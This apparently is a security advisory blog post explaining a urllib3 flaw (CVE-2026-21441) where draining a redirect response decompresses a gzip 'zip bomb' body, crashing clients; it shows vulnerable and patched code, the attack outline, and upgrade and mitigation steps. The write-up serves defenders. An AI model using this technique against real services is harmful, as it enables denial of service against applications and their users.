Feb 23, 2026·6 min read·79 visits
urllib3 < 2.6.3 automatically decompresses response bodies even when merely trying to 'drain' a connection for a redirect. Attacker sends a 302 Found with a 'zip bomb' body -> Client RAM evaporates -> Service crashes.
A high-severity logic flaw in urllib3, the Python ecosystem's most popular HTTP client, allows for Denial of Service via decompression bombs. When handling HTTP redirects in streaming mode, the library inadvertently decompressed the response body of the redirect (3xx) before discarding it. This allows an attacker to send a small, highly compressed payload (like a zip bomb) inside a redirect response, forcing the client to expand it into gigabytes of data in memory, crashing the application instantly.
If you write Python, you use urllib3. You might not know it—you probably use requests—but urllib3 is the engine room. It handles the dirty work: connection pooling, SSL verification, and socket management. It is the plumbing of the Python internet.
One of the most useful features of this plumbing is preload_content=False (or stream=True in Requests). This tells the library: "Hey, I'm expecting a big file. Don't download it all at once. Let me sip it byte by byte." It's a safety mechanism, designed specifically to prevent your memory from exploding when fetching large datasets.
But CVE-2026-21441 proves that even safety mechanisms can be weaponized. It turns out that while urllib3 was busy protecting you from the final destination's payload, it was completely exposing your jugular to the journey there. Specifically, the redirect. It's a classic case of the "confused deputy"—the library tries to be helpful by cleaning up a socket, and in doing so, it commits suicide.
To understand this bug, you have to understand HTTP Keep-Alive. When a client makes a request and receives a response, it wants to reuse that TCP connection for the next request to save overhead. But you can't reuse a socket if there is still leftover data sitting in the pipe from the previous response. You have to "drain" it.
In urllib3, when a server responds with a redirect (like a 302 Found), the library decides to follow it. But before it can send the request to the new location, it must scrub the socket clean of the old response (the 302 body). Enter the drain_conn() method.
Here is the logic failure: drain_conn() was implemented by simply calling self.read(). The developers assumed read() would just pull bytes off the wire and toss them into the void.
However, urllib3 is helpful. Too helpful. If the server sends a Content-Encoding: gzip header, self.read() automatically triggers the decompression logic. It doesn't care that you are just trying to flush the toilet; it inspects the contents anyway. The library sees a compressed stream, thinks "I bet the user wants this inflated," and expands it into RAM. All of it. All at once.
The vulnerability lived in src/urllib3/response.py. It's a masterclass in how a single line of innocuous code can bring down a production cluster.
Here is the vulnerable implementation of the drain function. Notice the lack of parameters passed to read():
# VULNERABLE CODE (urllib3 < 2.6.3)
def drain_conn(self) -> None:
try:
# The fatal flaw: read() defaults to decode_content=True
# if a compression header is present.
self.read()
except (HTTPError, OSError, BaseSSLError, HTTPException):
passWhen read() is called without arguments, it checks the Content-Encoding header. If it sees gzip, deflate, br, or zstd, it initializes the decompressor and runs the stream through it.
Here is the fix implemented in version 2.6.3. It explicitly tells the read method: "Do not decode this unless we have already started decoding it."
# PATCHED CODE (urllib3 >= 2.6.3)
def drain_conn(self) -> None:
try:
self.read(
# The Fix: explicitly forbid decoding during the drain
# unless the user had already started reading it.
decode_content=self._has_decoded_content,
)
except (HTTPError, OSError, BaseSSLError, HTTPException):
passThis simple boolean flag decode_content makes the difference between a healthy service and an OOM (Out of Memory) crash.
To exploit this, an attacker doesn't need complex memory corruption or ROP chains. They just need a basic understanding of compression algorithms. The goal is Asymmetric Resource Exhaustion: send a few kilobytes of data that the victim expands into gigabytes.
302 Found status code. Crucially, they add Content-Encoding: gzip and a body consisting of a "zip bomb" (e.g., a stream of infinite zeros compressed via DEFLATE).Because the expansion happens inside the library's internal "cleanup" routine, the application developer's safeguards (like reading chunks of 1024 bytes) are ignored. The library tries to drain the entire redirect body before handing control back to the application.
This vulnerability is particularly nasty because of where urllib3 sits in the ecosystem. It is the bedrock of Python automation.
This is a Denial of Service (DoS) vulnerability. While it doesn't offer Remote Code Execution (RCE) directly, the operational impact is massive. A single malicious request can take down a worker process consuming 100% CPU and MAX RAM until the OS kills it.
The remediation is straightforward, but the urgency is high given the ubiquity of the library.
Upgrade urllib3 to version 2.6.3 or higher. This version was released on January 7, 2026.
pip install --upgrade urllib3
# OR if you use requests
pip install --upgrade requests> [!NOTE]
> Ensure you check your transitive dependencies. Even if your direct code doesn't import urllib3, your other libraries likely do.
If you cannot patch immediately, you can mitigate this by disabling automatic redirects in your HTTP calls. This forces your application to handle the 3xx response manually, where you can choose to discard the body without reading it.
# Mitigation: Disable automatic redirects
http = urllib3.PoolManager()
response = http.request('GET', 'http://untrusted-source.com', redirect=False)While difficult to detect at the network layer (since the payload is valid compressed data), WAFs can be configured to block responses with unusually high compression ratios if they are performing SSL termination and inspection, though this is computationally expensive.
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H| Product | Affected Versions | Fixed Version |
|---|---|---|
urllib3 urllib3 | >= 1.22, < 2.6.3 | 2.6.3 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-409 (Improper Handling of Highly Compressed Data) |
| CVSS v4.0 | 8.9 (High) |
| Attack Vector | Network (Response to Outbound Request) |
| Affected Component | urllib3.response.drain_conn |
| Privileges Required | None |
| Exploit Status | PoC Available |
The software handles a compressed data bundle but does not strictly limit the size of the uncompressed data, allowing for resource exhaustion.